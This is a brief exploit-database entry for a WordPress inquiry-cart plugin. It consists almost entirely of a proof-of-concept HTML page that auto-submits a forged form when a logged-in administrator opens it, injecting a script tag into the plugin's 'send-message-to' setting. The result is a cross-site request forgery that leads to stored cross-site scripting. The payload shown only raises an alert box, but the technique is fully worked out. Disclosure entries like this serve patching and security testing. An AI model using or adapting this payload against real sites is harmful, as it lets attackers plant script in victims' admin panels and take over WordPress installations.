Share
## https://sploitus.com/exploit?id=WPEX-ID:F1E90A8A-D959-4316-A5D4-E183854944BD
Make a logged in admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=inquiry-cart%2Finquiry-cart.php" method="post">
<input name="send-message-to" type="text" value='"><script>alert(9995)</script>'>
<input type="text" name="rd-ic-hidden" value="y">
<input type="submit" name="submit" value="submit">
</form>
</body>
```